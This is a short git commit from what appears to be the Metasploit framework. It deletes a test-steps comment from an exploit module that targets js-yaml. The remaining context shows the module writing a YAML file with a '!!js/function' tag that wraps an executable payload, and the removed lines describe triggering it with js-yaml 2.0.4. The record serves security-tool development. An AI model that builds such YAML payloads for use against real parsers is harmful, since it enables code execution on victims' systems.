Kill explanatory comment.

bug/bundler_fix
Joe Vennix 2013-09-16 21:34:38 -05:00
parent f954e5299f
commit 5fc724bced
1 changed files with 0 additions and 11 deletions

View File

@ -46,14 +46,3 @@ class Metasploit3 < Msf::Exploit::Remote
file_create("a: !!js/function >\n (function(){ #{p} })();")
end
end
# Test steps:
#
# sudo npm i js-yaml@2.0.4
#
# #!/usr/bin/env node
# // save this file to parse.js
# var yaml = require('js_yaml');
# yaml.load('msf.yml')
#
# node parse.js